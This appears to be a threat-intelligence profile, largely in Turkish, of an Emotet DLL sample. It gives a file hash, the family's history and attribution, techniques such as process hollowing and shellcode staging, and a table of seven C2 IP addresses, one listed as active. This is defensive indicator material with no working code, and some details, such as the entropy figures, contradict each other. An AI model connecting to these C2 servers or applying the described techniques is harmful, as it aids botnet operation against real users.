Dosya Kimligi
| SHA256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 |
|---|---|
| Dosya Adi | Emotet Payload: 32-bit DLL.dll |
| Boyut | 193.536 byte |
| String Sayisi | 327 (cok agir paket) |
RC4 Sifrelenmis C2 Fragment
122C2J2p2 -- RC4/AES sifrelenmis C2 config fragmenti -- 327 string tipik Emotet yuksek entropi paketi
Emotet Hakkinda
Emotet (Heodo), 2014'ten beri aktif modular botnet altyapisidir. 2021 Europol operasyonuyla yikilmis, 2022'de yeniden dogurmustir. Polimorfik imza, RC4 sifrelenmis IP listesi, Cobalt Strike/ransomware yukleme.
IOC
| SHA256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 |
|---|---|
| C2 | RC4 sifrelenmis IP listesi |
Emotet — Malware Profile
Emotet (Heodo/Mealybug/TA542) 32-bit DLL payload. Process enumeration via CreateToolhelp32Snapshot+Process32First/Next. VirtualAlloc+VirtualProtect shellcode staging. ntdll.dll direct calls. Low entropy 3.92 (stage-1 loader/encoded payload). Suspicious imagebase and DOS stub.
Technical Details
C dili, HTTP C2 (RSA+AES sifreleme), modular yapi (email stealer, spreader, Outlook harvester), process hollowing, living off the land (regsvr32, mshta, certutil), Epoch1/2/3/4/5 botnet
Attribution / Threat Actor
TA542 (MUMMY SPIDER) - Ukrayna kokenli oldugu dusunulen organizasyon. 2021'de Europol/FBI tarafindan coguyla tutuklandi; 2022'de geri dondu.
Capabilities & Behavior
IOC List (1 indicators)
# SHA256
e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965
| Type | Value | Note |
|---|---|---|
| sha256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 |
C2 Servers (7 recorded servers for this family)
| Address | Type | Port | Protocol | Status | Country |
|---|---|---|---|---|---|
| 41.216.188.11 | ip | 8000 | HTTP | active | — |
| 103.143.173.206 | ip | 443 | HTTPS | inactive | ID |
| 144.91.65.153 | ip | 7080 | HTTP | inactive | DE |
| 195.88.54.144 | ip | 8080 | HTTP | sinkholed | — |
| 103.43.46.149 | ip | 443 | HTTPS | sinkholed | — |
| 185.220.101.32 | ip | 80 | HTTP | sinkholed | DE |
| 5.135.183.154 | ip | 8080 | HTTP | sinkholed | FR |
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.